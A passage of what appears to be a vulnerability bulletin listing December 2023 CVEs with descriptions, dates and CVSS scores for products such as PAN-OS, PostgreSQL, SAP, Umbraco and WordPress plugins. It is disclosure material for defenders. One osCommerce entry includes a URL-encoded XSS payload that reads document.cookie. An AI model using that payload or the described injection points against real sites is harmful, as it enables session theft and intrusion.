oretnom23 -- simple_student_attendance_system
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247253 was assigned to this vulnerability.
2023-12-08
6.1
CVE-2023-6616
[email protected]
[email protected]
[email protected]
oscommerce -- oscommerce
A vulnerability was found in osCommerce 4. It has been classified as problematic. This affects an unknown part of the file /b2b-supermarket/catalog/all-products. The manipulation of the argument keywords with the input %27%22%3E%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
2023-12-08
6.1
CVE-2023-6609
[email protected]
[email protected]
otcms -- otcms
A vulnerability, which was classified as critical, was found in OTCMS 7.01. Affected is an unknown function of the file /admin/ind_backstage.php. The manipulation of the argument sqlContent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247908.
2023-12-13
4.7
CVE-2023-6772
[email protected]
[email protected]
[email protected]
palo_alto_networks -- pan-os
An OS command injection vulnerability in the XML API of Palo Alto Networks PAN-OS software enables an authenticated API user to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall.
2023-12-13
5.5
CVE-2023-6792
[email protected]
palo_alto_networks -- pan-os
An arbitrary file upload vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-write administrator with access to the web interface to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall.
2023-12-13
5.5
CVE-2023-6794
[email protected]
palo_alto_networks -- pan-os
An OS command injection vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to disrupt system processes and potentially execute arbitrary code with limited privileges on the firewall.
2023-12-13
5.5
CVE-2023-6795
[email protected]
palo_alto_networks -- pan-os
A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a malicious authenticated read-write administrator to store a JavaScript payload using the web interface. Then, when viewed by a properly authenticated administrator, the JavaScript payload executes and disguises all associated actions as performed by that unsuspecting authenticated administrator.
2023-12-13
4.3
CVE-2023-6789
[email protected]
palo_alto_networks -- pan-os
A credential disclosure vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-only administrator to obtain the plaintext credentials of stored external system integrations such as LDAP, SCP, RADIUS, TACACS+, and SNMP from the web interface.
2023-12-13
4.9
CVE-2023-6791
[email protected]
phpgurukul -- teacher_subject_allocation_management_system
A vulnerability has been found in PHPGurukul Teacher Subject Allocation Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file index.php. The manipulation of the argument searchdata with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-247342 is the identifier assigned to this vulnerability.
2023-12-10
6.1
CVE-2023-6649
[email protected]
[email protected]
[email protected]
phpgurukul -- teacher_subject_allocation_management_system
A vulnerability was found in PHPGurukul Teacher Subject Allocation Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/subject.php of the component Create a new Subject. The manipulation of the argument cid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247346 is the identifier assigned to this vulnerability.
2023-12-10
4.3
CVE-2023-6653
[email protected]
[email protected]
[email protected]
phpgurukul -- teacher_subject_allocation_management_system
A vulnerability classified as problematic has been found in PHPGurukul Teacher Subject Allocation Management System 1.0. Affected is an unknown function of the file /admin/course.php of the component Delete Course Handler. The manipulation of the argument delid leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247896.
2023-12-13
4.3
CVE-2023-6766
[email protected]
[email protected]
[email protected]
postgresql -- postgresql
A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.
2023-12-10
4.3
CVE-2023-5868
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
postgresql -- postgresql
A flaw was found in PostgreSQL involving the pg_cancel_backend role that signals background workers, including the logical replication launcher, autovacuum workers, and the autovacuum launcher. Successful exploitation requires a non-core extension with a less-resilient background worker and would affect that specific background worker only. This issue may allow a remote high privileged user to launch a denial of service (DoS) attack.
2023-12-10
4.4
CVE-2023-5870
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
progress_software_corporation -- whatsup_gold
In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate information related to a registered device being monitored by WhatsUp Gold.
2023-12-14
5.9
CVE-2023-6368
[email protected]
[email protected]
prolion -- cryptospike
Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters.
2023-12-12
6.5
CVE-2023-36654
[email protected]
prolion -- cryptospike
A SQL Injection in the users searching REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to read database data via SQL commands injected in the search parameter.
2023-12-12
4.3
CVE-2023-36652
[email protected]
python -- python
An issue was found in CPython 3.12.0 subprocess module on POSIX platforms. The issue was fixed in CPython 3.12.1 and does not affect other stable releases. When using the extra_groups= parameter with an empty list as a value (ie extra_groups=[]) the logic regressed to not call setgroups(0, NULL) before calling exec(), thus not dropping the original processes' groups before starting the new process. There is no issue when the parameter isn't used or when any value is used besides an empty list. This issue only impacts CPython processes run with sufficient privilege to make the setgroups system call (typically root).
2023-12-08
4.9
CVE-2023-6507
[email protected]
[email protected]
[email protected]
qnap -- qts
A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to inject malicious code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2425 build 20230609 and later QTS 5.1.0.2444 build 20230629 and later QTS 4.5.4.2467 build 20230718 and later QuTS hero h5.1.0.2424 build 20230609 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h4.5.4.2476 build 20230728 and later
2023-12-08
6.1
CVE-2023-23372
[email protected]
qualys -- private_cloud_platform
A Qualys web application was found to have a stored XSS vulnerability resulting from the absence of HTML encoding in the presentation of logging information to users. This vulnerability allowed a user with login access to the application to introduce XSS payload via browser details.
2023-12-08
5.4
CVE-2023-6146
[email protected]
redhat -- advanced_cluster_security
In Red Hat Advanced Cluster Security (RHACS), it was found that some security related HTTP headers were missing, allowing an attacker to exploit this with a clickjacking attack. An attacker could exploit this by convincing a valid RHACS user to visit an attacker-controlled web page, that deceptively points to valid RHACS endpoints, hijacking the user's account permissions to perform other actions.
2023-12-12
6.1
CVE-2023-4958
[email protected]
[email protected]
[email protected]
repox -- repox
An XSS vulnerability has been detected in Repox, which allows an attacker to compromise interactions between a user and the vulnerable application, and can be exploited by a third party by sending a specially crafted JavaScript payload to a user, and thus gain full control of their session.
2023-12-13
6.3
CVE-2023-6719
[email protected]
repox -- repox
An XSS vulnerability stored in Repox has been identified, which allows a local attacker to store a specially crafted JavaScript payload on the server, due to the lack of proper sanitisation of field elements, allowing the attacker to trigger the malicious payload when the application loads.
2023-12-13
5.5
CVE-2023-6720
[email protected]
samsung -- exynos_980_firmware
Samsung Mobile Processor and Wearable Processor (Exynos 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, and W920) allow Information Disclosure in the Bootloader.
2023-12-13
4.6
CVE-2023-43122
[email protected]
samsung -- exynos_9820_firmware
A TOCTOU race condition in Samsung Mobile Processor Exynos 9820, Exynos 980, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, and Exynos 1380 can cause unexpected termination of a system.
2023-12-13
4.7
CVE-2023-42483
[email protected]
samsung -- exynos_9820_firmware
A race condition issue discovered in Samsung Mobile Processor Exynos 9820, 980, 1080, 2100, 2200, 1280, and 1380 allows unintended modifications of values within certain areas.
2023-12-13
4.7
CVE-2023-45864
[email protected]
sap -- biller_direct
An unauthenticated attacker can embed a hidden access to a Biller Direct URL in a frame which, when loaded by the user, will submit a cross-site scripting request to the Biller Direct system. This can result in the disclosure or modification of non-sensitive information.
2023-12-12
6.1
CVE-2023-42479
[email protected]
[email protected]
sap -- businessobjects_web_intelligence
SAP Business Objects Web Intelligence - version 420, allows an authenticated attacker to inject JavaScript code into Web Intelligence documents which is then executed in the victim's browser each time the vulnerable page is visited. Successful exploitation can lead to exposure of the data that the user has access to. In the worst case, attacker could access data from reporting databases.
2023-12-12
6.8
CVE-2023-42476
[email protected]
[email protected]
sap -- fiori_launchpad
SAP Fiori launchpad - versions SAP_UI 750, SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, UI_700 200, SAP_BASIS 793, allows an attacker to use HTTP verb POST on read-only service causing low impact on Confidentiality of the application.
2023-12-12
4.3
CVE-2023-49584
[email protected]
[email protected]
sap -- master_data_governance
SAP Master Data Governance File Upload application allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing 'traverse to parent directory' are passed through to the file APIs. As a result, it has a low impact to the confidentiality.
2023-12-12
5.3
CVE-2023-49058
[email protected]
[email protected]
sap -- solution_manager
SAP Solution Manager - version 720, allows an authorized attacker to execute certain deprecated function modules which can read or modify data of same or other component without user interaction over the network.
2023-12-12
6.4
CVE-2023-49587
[email protected]
[email protected]
sap_se -- sap_gui
SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability.
2023-12-12
4.1
CVE-2023-49581
[email protected]
[email protected]
sap_se -- sap_hcm_(smart_paye_solution)
The SAP HCM (SMART PAYE solution) - versions S4HCMCIE 100, SAP_HRCIE 600, SAP_HRCIE 604, SAP_HRCIE 608, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. After successful exploitation, an attacker can cause limited impact on confidentiality and integrity of the application.
2023-12-12
6.1
CVE-2023-49577
[email protected]
[email protected]
sas -- integration_technologies
SAS application is vulnerable to Reflected Cross-Site Scripting (XSS). Improper input validation in the _program parameter of the the /SASStoredProcess/do endpoint allows arbitrary JavaScript to be executed when specially crafted URL is opened by an authenticated user. The attack is possible from a low-privileged user. Only versions 9.4_M7 and 9.4_M8 were tested and confirmed to be vulnerable, status of others is unknown. For above mentioned versions hot fixes were published.
2023-12-12
5.4
CVE-2023-4932
[email protected]
[email protected]
[email protected]
schneider_electric -- easy_ups_online_monitoring
A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could cause arbitrary file deletion upon service restart when accessed by a local and low-privileged attacker.
2023-12-14
5.3
CVE-2023-6407
[email protected]
schneider_electric -- trio_q-series_ethernet_data_radio
A CWE-494: Download of Code Without Integrity Check vulnerability exists that could allow a privileged user to install an untrusted firmware.
2023-12-14
6.5
CVE-2023-5630
[email protected]
seafile -- seafile
The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites.
2023-12-09
6.1
CVE-2023-28874
[email protected]
[email protected]
seafile -- seafile
An XSS issue in wiki and discussion pages in Seafile 9.0.6 allows attackers to inject JavaScript into the Markdown editor.
2023-12-09
5.4
CVE-2023-28873
[email protected]
[email protected]
semantic-mediawiki -- semantic_mediawiki
Special:Ask in Semantic MediaWiki before 4.0.2 allows Reflected XSS.
2023-12-10
6.1
CVE-2022-48614
[email protected]
[email protected]
siemens -- multiple_products
A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). A reflected cross-site scripting (XSS) vulnerability exists in the web interface of the affected applications that could allow an attacker to inject arbitrary JavaScript code. The code could be potentially executed later by another (possibly privileged) user.
2023-12-12
6.1
CVE-2023-46282
[email protected]
siemens -- simatic
A vulnerability has been identified in SIMATIC STEP 7 (TIA Portal) (All versions < V19). An information disclosure vulnerability could allow a local attacker to gain access to the access level password of the SIMATIC S7-1200 and S7-1500 CPUs, when entered by a legitimate user in the hardware configuration of the affected application.
2023-12-12
5.5
CVE-2022-46141
[email protected]
silicon_labs -- multiple_products
A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device.
2023-12-15
5.7
CVE-2023-5310
[email protected]
[email protected]
silicon_labs -- z/ip_gateway_sdk
The first S0 encryption key is generated with an uninitialized PRNG in Z/IP Gateway products running Silicon Labs Z/IP Gateway SDK v7.18.3 and earlier. This makes the first S0 key generated at startup predictable, potentially allowing network key prediction and unauthorized S0 network access.
2023-12-14
6.4
CVE-2023-4489
[email protected]
[email protected]
silverpeas -- silverpeas
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the "Porlet Deployer" which allows administrators to deploy .WAR portlets.
2023-12-13
4.9
CVE-2023-47321
[email protected]
[email protected]
sissbruecker -- linkding
A vulnerability classified as problematic has been found in linkding 1.23.0. Affected is an unknown function. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.23.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-247338 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product.
2023-12-09
5.4
CVE-2023-6646
[email protected]
[email protected]
[email protected]
[email protected]
smartstar_software -- cws
SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can't disrupt service or obtain sensitive information.
2023-12-15
6.5
CVE-2023-48374
[email protected]
softnext -- mail_sqr_expert
Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.
2023-12-15
6.5
CVE-2023-48381
[email protected]
softnext -- mail_sqr_expert
Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.
2023-12-15
6.5
CVE-2023-48382
[email protected]
softnext -- mail_sqr_expert
Softnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response.
2023-12-15
5.3
CVE-2023-48379
[email protected]
sourcecodester -- online_tours_&_travels_management_system

A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function prepare of the file email_setup.php. The manipulation of the argument name leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247895.
2023-12-13
5.5
CVE-2023-6765
[email protected]
[email protected]
[email protected]
sourcecodester -- simple_invoice_generator_system
A vulnerability was found in SourceCodester Simple Invoice Generator System 1.0 and classified as problematic. This issue affects some unknown processing of the file login.php. The manipulation of the argument cashier leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247343.
2023-12-10
6.1
CVE-2023-6650
[email protected]
[email protected]
[email protected]
sourcecodester -- simple_student_attendance_system

A vulnerability, which was classified as critical, has been found in SourceCodester Simple Student Attendance System 1.0. This issue affects the function save_attendance of the file actions.class.php. The manipulation of the argument sid leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247907.
2023-12-13
5.5
CVE-2023-6771
[email protected]
[email protected]
[email protected]
sourcecodester -- wedding_guest_e-book

A vulnerability, which was classified as problematic, was found in SourceCodester Wedding Guest e-Book 1.0. This affects an unknown part of the file /endpoint/add-guest.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-247899.
2023-12-13
4.3
CVE-2023-6767
[email protected]
[email protected]
specklesystems -- speckle-server
Speckle Server provides server, frontend, 3D viewer, and other JavaScript utilities for the Speckle 3D data platform. A vulnerability in versions prior to 2.17.6 affects users who: authorized an application which requested a 'token write' scope or, using frontend-2, created a Personal Access Token (PAT) with token write scope. When creating a new token an agent needs to authorise the request with an existing token (the 'requesting token'). The requesting token is required to have token write scope in order to generate new tokens. However, Speckle server was not verifying that other privileges granted to the new token were not in excess of the privileges of the requesting token. A malicious actor could use a token with only token write scope to subsequently generate further tokens with additional privileges. These privileges would only grant privileges up to the existing privileges of the user. This vulnerability cannot be used to escalate a user's privileges or grant privileges on behalf of other users. This has been patched as of version 2.17.6. All operators of Speckle servers should upgrade their server to version 2.17.6 or higher. Any users who authorized an application with 'token write' scope, or created a token in frontend-2 with token write scope should review existing tokens and permanently revoke any they do not recognize, revoke existing tokens and create new tokens, and review usage of their account for suspicious activity. No known workarounds for this issue exist.
2023-12-14
6.5
CVE-2023-50713
[email protected]
[email protected]
[email protected]
taiwan-ca -- jcicsecuritytool
TAIWAN-CA(TWCA) JCICSecurityTool's Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack.
2023-12-15
6.1
CVE-2023-48387
[email protected]
thecosy -- icecms
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /adplanet/PlanetUser of the component API. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247885 was assigned to this vulnerability.
2023-12-13
6.5
CVE-2023-6757
[email protected]
[email protected]
[email protected]
thecosy -- icecms
A vulnerability classified as critical was found in Thecosy IceCMS up to 2.0.1. This vulnerability affects unknown code. The manipulation leads to manage user sessions. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247888.
2023-12-13
5.4
CVE-2023-6760
[email protected]
[email protected]
[email protected]
thecosy -- icecms
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /adplanet/PlanetCommentList of the component API. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247886 is the identifier assigned to this vulnerability.
2023-12-13
4.3
CVE-2023-6758
[email protected]
[email protected]
[email protected]
thecosy -- icecms
A vulnerability, which was classified as critical, was found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /article/DelectArticleById/ of the component Article Handler. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-247890 is the identifier assigned to this vulnerability.
2023-12-13
4.3
CVE-2023-6762
[email protected]
[email protected]
[email protected]
tongda -- oa_2017
A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
2023-12-16
5.5
CVE-2023-6885
[email protected]
[email protected]
[email protected]
typecho -- typecho
A vulnerability, which was classified as problematic, has been found in Typecho 1.2.1. Affected by this issue is some unknown functionality of the file /admin/manage-users.php. The manipulation of the argument page leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-247250 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
2023-12-08
5.3
CVE-2023-6615
[email protected]
[email protected]
[email protected]
typecho -- typecho
A vulnerability classified as problematic has been found in Typecho 1.2.1. Affected is an unknown function of the file /admin/options-theme.php of the component Logo Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
2023-12-08
4.8
CVE-2023-6613
[email protected]
[email protected]
[email protected]
ubuntu_budgie -- budgie_extras
Temporary data passed between application components by Budgie Extras Clockworks applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.
2023-12-14
6
CVE-2023-49342
[email protected]
[email protected]
[email protected]
ubuntu_budgie -- budgie_extras
Temporary data passed between application components by Budgie Extras Dropby applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.
2023-12-14
6
CVE-2023-49343
[email protected]
[email protected]
[email protected]
ubuntu_budgie -- budgie_extras
Temporary data passed between application components by Budgie Extras Window Shuffler applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.
2023-12-14
6
CVE-2023-49344
[email protected]
[email protected]
[email protected]
ubuntu_budgie -- budgie_extras
Temporary data passed between application components by Budgie Extras Takeabreak applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.
2023-12-14
6
CVE-2023-49345
[email protected]
[email protected]
[email protected]
ubuntu_budgie -- budgie_extras
Temporary data passed between application components by Budgie Extras WeatherShow applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.
2023-12-14
6
CVE-2023-49346
[email protected]
[email protected]
[email protected]
ubuntu_budgie -- budgie_extras
Temporary data passed between application components by Budgie Extras Windows Previews could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may read private information from windows, present false information to users, or deny access to the application.
2023-12-14
6
CVE-2023-49347
[email protected]
[email protected]
[email protected]
umbraco -- umbraco_cms
Umbraco is an ASP.NET content management system (CMS). Starting in 10.0.0 and prior to versions 10.8.1 and 12.3.4, Umbraco contains a cross-site scripting (XSS) vulnerability enabling attackers to bring malicious content into a website or application. Versions 10.8.1 and 12.3.4 contain a patch for this issue.
2023-12-12
6.1
CVE-2023-48313
[email protected]
umbraco -- umbraco_cms
Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.0, Backoffice users with permissions to create packages can use path traversal and thereby write outside of the expected location. Versions 8.18.10, 10.8.1, and 12.3.0 contain a patch for this issue.
2023-12-12
6.5
CVE-2023-49089
[email protected]
umbraco -- umbraco_cms
Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, users with low privileges (Editor, etc.) are able to access some unintended endpoints. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue.
2023-12-12
5.4
CVE-2023-49273
[email protected]
umbraco -- umbraco_cms
Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, a user enumeration attack is possible when SMTP is not set up correctly, but reset password is enabled. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue.
2023-12-12
5.3
CVE-2023-49274
[email protected]
umbraco -- umbraco_cms
Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, a brute force exploit can be used to collect valid usernames. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue.
2023-12-12
5.3
CVE-2023-49278
[email protected]
umbraco -- umbraco_cms
Umbraco is an ASP.NET content management system (CMS). Starting in version 7.0.0 and prior to versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0, a user with access to the backoffice can upload SVG files that include scripts. If the user can trick another user to load the media directly in a browser, the scripts can be executed. Versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0 contain a patch for this issue. Some workarounds are available. Implement the server side file validation or serve all media from an different host (e.g cdn) than where Umbraco is hosted.
2023-12-12
5.4
CVE-2023-49279
[email protected]
[email protected]
umbraco -- umbraco_cms
Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.7.0, and 12.3.0, Backoffice users with send for approval permission but not publish permission are able to publish in some scenarios. Versions 8.18.10, 10.7.0, and 12.3.0 contains a patch for this issue. No known workarounds are available.
2023-12-12
4.3
CVE-2023-48227
[email protected]
voltronicpower -- snmp_web_pro
Cross Site Scripting (XSS) in Voltronic Power SNMP Web Pro v.1.1 allows an attacker to execute arbitrary code via a crafted script within a request to the webserver.
2023-12-12
6.1
CVE-2023-49563
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Till Krüss Email Address Encoder allows Stored XSS.This issue affects Email Address Encoder: from n/a through 1.0.22.
2023-12-15
6.5
CVE-2023-48765
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nima Saberi Aparat allows Stored XSS.This issue affects Aparat: from n/a through 1.7.1.
2023-12-14
6.5
CVE-2023-48770
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EnigmaWeb WP Catalogue allows Stored XSS.This issue affects WP Catalogue: from n/a through 1.7.6.
2023-12-14
6.5
CVE-2023-48780
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.Today Currency Converter Calculator allows Stored XSS.This issue affects Currency Converter Calculator: from n/a through 1.3.1.
2023-12-14
6.5
CVE-2023-49149
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.Today Crypto Converter Widget allows Stored XSS.This issue affects Crypto Converter Widget: from n/a through 1.8.1.
2023-12-14
6.5
CVE-2023-49150
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Simple Calendar Simple Calendar - Google Calendar Plugin allows Stored XSS.This issue affects Simple Calendar - Google Calendar Plugin: from n/a through 3.2.6.
2023-12-14
6.5
CVE-2023-49151
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Labs64 Credit Tracker allows Stored XSS.This issue affects Credit Tracker: from n/a through 1.1.17.
2023-12-14
6.5
CVE-2023-49152
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in formzu Inc. Formzu WP allows Stored XSS.This issue affects Formzu WP: from n/a through 1.6.6.
2023-12-15
6.5
CVE-2023-49160
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WordPlus Better Messages - Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss allows Stored XSS.This issue affects Better Messages - Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss: from n/a through 2.4.0.
2023-12-14
6.5
CVE-2023-49168
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS.This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.
2023-12-15
6.5
CVE-2023-49169
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10to8 Sign In Scheduling Online Appointment Booking System allows Stored XSS.This issue affects Sign In Scheduling Online Appointment Booking System: from n/a through 1.0.9.
2023-12-14
6.5
CVE-2023-49173
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS.This issue affects Event post: from n/a through 5.8.6.
2023-12-15
6.5
CVE-2023-49179
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins Spiffy Calendar allows Stored XSS.This issue affects Spiffy Calendar: from n/a through 4.9.5.
2023-12-14
6.5
CVE-2023-49745
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3.
2023-12-14
6.5
CVE-2023-49820
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS.This issue affects Bold Page Builder: from n/a through 4.6.1.
2023-12-15
6.5
CVE-2023-49823
[email protected]
wordpress -- wordpress
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Automattic WooPayments - Fully Integrated Solution Built and Supported by Woo allows Stored XSS.This issue affects WooPayments - Fully Integrated Solution Built and Supported by Woo: from n/a through 6.4.2.
2023-12-14
6.5
CVE-2023-49828
[email protected]
wordpress -- wordpress
